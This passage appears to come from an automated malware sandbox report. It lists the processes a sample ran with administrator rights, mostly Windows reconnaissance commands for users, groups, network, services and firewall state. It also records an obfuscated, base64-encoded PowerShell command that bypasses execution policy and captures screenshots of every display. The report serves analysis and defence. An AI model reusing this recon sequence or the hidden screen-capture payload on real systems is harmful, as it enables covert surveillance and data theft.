                                                                                                                                                                                                                                            Imagebase:0x7ff715560000
                                                                                                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                                                                                                            MD5 hash:33AFAA43B84BDEAB12E02F9DBD2B2EE0
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:54
                                                                                                                                                                                                                                            Start time:18:38:41
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:wmic logicaldisk get caption,description,providername
                                                                                                                                                                                                                                            Imagebase:0x7ff6e2c90000
                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:55
                                                                                                                                                                                                                                            Start time:18:38:42
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:net user
                                                                                                                                                                                                                                            Imagebase:0x7ff732790000
                                                                                                                                                                                                                                            File size:59'904 bytes
                                                                                                                                                                                                                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:56
                                                                                                                                                                                                                                            Start time:18:38:42
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\net1 user
                                                                                                                                                                                                                                            Imagebase:0x7ff671c90000
                                                                                                                                                                                                                                            File size:183'808 bytes
                                                                                                                                                                                                                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:57
                                                                                                                                                                                                                                            Start time:18:38:42
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\query.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:query user
                                                                                                                                                                                                                                            Imagebase:0x7ff757550000
                                                                                                                                                                                                                                            File size:17'408 bytes
                                                                                                                                                                                                                                            MD5 hash:29043BC0B0F99EAFF36CAD35CBEE8D45
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:58
                                                                                                                                                                                                                                            Start time:18:38:42
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\quser.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Windows\system32\quser.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff6d1c10000
                                                                                                                                                                                                                                            File size:25'600 bytes
                                                                                                                                                                                                                                            MD5 hash:480868AEBA9C04CA04D641D5ED29937B
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:60
                                                                                                                                                                                                                                            Start time:18:38:43
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:net localgroup
                                                                                                                                                                                                                                            Imagebase:0x7ff732790000
                                                                                                                                                                                                                                            File size:59'904 bytes
                                                                                                                                                                                                                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:61
                                                                                                                                                                                                                                            Start time:18:38:43
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\net1 localgroup
                                                                                                                                                                                                                                            Imagebase:0x7ff671c90000
                                                                                                                                                                                                                                            File size:183'808 bytes
                                                                                                                                                                                                                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:62
                                                                                                                                                                                                                                            Start time:18:38:43
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:net localgroup administrators
                                                                                                                                                                                                                                            Imagebase:0x7ff732790000
                                                                                                                                                                                                                                            File size:59'904 bytes
                                                                                                                                                                                                                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:63
                                                                                                                                                                                                                                            Start time:18:38:43
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\net1 localgroup administrators
                                                                                                                                                                                                                                            Imagebase:0x7ff671c90000
                                                                                                                                                                                                                                            File size:183'808 bytes
                                                                                                                                                                                                                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:64
                                                                                                                                                                                                                                            Start time:18:38:43
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:net user guest
                                                                                                                                                                                                                                            Imagebase:0x7ff732790000
                                                                                                                                                                                                                                            File size:59'904 bytes
                                                                                                                                                                                                                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:65
                                                                                                                                                                                                                                            Start time:18:38:43
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\net1 user guest
                                                                                                                                                                                                                                            Imagebase:0x7ff671c90000
                                                                                                                                                                                                                                            File size:183'808 bytes
                                                                                                                                                                                                                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:66
                                                                                                                                                                                                                                            Start time:18:38:44
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:net user administrator
                                                                                                                                                                                                                                            Imagebase:0x7ff732790000
                                                                                                                                                                                                                                            File size:59'904 bytes
                                                                                                                                                                                                                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:67
                                                                                                                                                                                                                                            Start time:18:38:44
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\net1 user administrator
                                                                                                                                                                                                                                            Imagebase:0x7ff671c90000
                                                                                                                                                                                                                                            File size:183'808 bytes
                                                                                                                                                                                                                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:68
                                                                                                                                                                                                                                            Start time:18:38:44
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:wmic startup get caption,command
                                                                                                                                                                                                                                            Imagebase:0x7ff6e2c90000
                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:69
                                                                                                                                                                                                                                            Start time:18:38:45
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tasklist /svc
                                                                                                                                                                                                                                            Imagebase:0x7ff6187b0000
                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:70
                                                                                                                                                                                                                                            Start time:18:38:45
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:ipconfig /all
                                                                                                                                                                                                                                            Imagebase:0x7ff63f900000
                                                                                                                                                                                                                                            File size:35'840 bytes
                                                                                                                                                                                                                                            MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:71
                                                                                                                                                                                                                                            Start time:18:38:45
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\ROUTE.EXE
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:route print
                                                                                                                                                                                                                                            Imagebase:0x7ff656ef0000
                                                                                                                                                                                                                                            File size:24'576 bytes
                                                                                                                                                                                                                                            MD5 hash:3C97E63423E527BA8381E81CBA00B8CD
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:72
                                                                                                                                                                                                                                            Start time:18:38:45
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\ARP.EXE
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:arp -a
                                                                                                                                                                                                                                            Imagebase:0x7ff7598b0000
                                                                                                                                                                                                                                            File size:26'624 bytes
                                                                                                                                                                                                                                            MD5 hash:2AF1B2C042B83437A4BE82B19749FA98
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:73
                                                                                                                                                                                                                                            Start time:18:38:45
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\NETSTAT.EXE
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:netstat -ano
                                                                                                                                                                                                                                            Imagebase:0x7ff7dd870000
                                                                                                                                                                                                                                            File size:39'936 bytes
                                                                                                                                                                                                                                            MD5 hash:7FDDD6681EA81CE26E64452336F479E6
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:74
                                                                                                                                                                                                                                            Start time:18:38:45
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:sc query type= service state= all
                                                                                                                                                                                                                                            Imagebase:0x7ff75f950000
                                                                                                                                                                                                                                            File size:72'192 bytes
                                                                                                                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:75
                                                                                                                                                                                                                                            Start time:18:38:46
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:netsh firewall show state
                                                                                                                                                                                                                                            Imagebase:0x7ff69f960000
                                                                                                                                                                                                                                            File size:96'768 bytes
                                                                                                                                                                                                                                            MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:76
                                                                                                                                                                                                                                            Start time:18:38:46
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:netsh firewall show config
                                                                                                                                                                                                                                            Imagebase:0x7ff69f960000
                                                                                                                                                                                                                                            File size:96'768 bytes
                                                                                                                                                                                                                                            MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:77
                                                                                                                                                                                                                                            Start time:18:38:47
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:78
                                                                                                                                                                                                                                            Start time:18:38:47
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:79
                                                                                                                                                                                                                                            Start time:18:38:47
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                            Imagebase:0x7ff6e2c90000
                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:80
                                                                                                                                                                                                                                            Start time:18:38:48
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:81
                                                                                                                                                                                                                                            Start time:18:38:48
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:82
                                                                                                                                                                                                                                            Start time:18:38:48
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
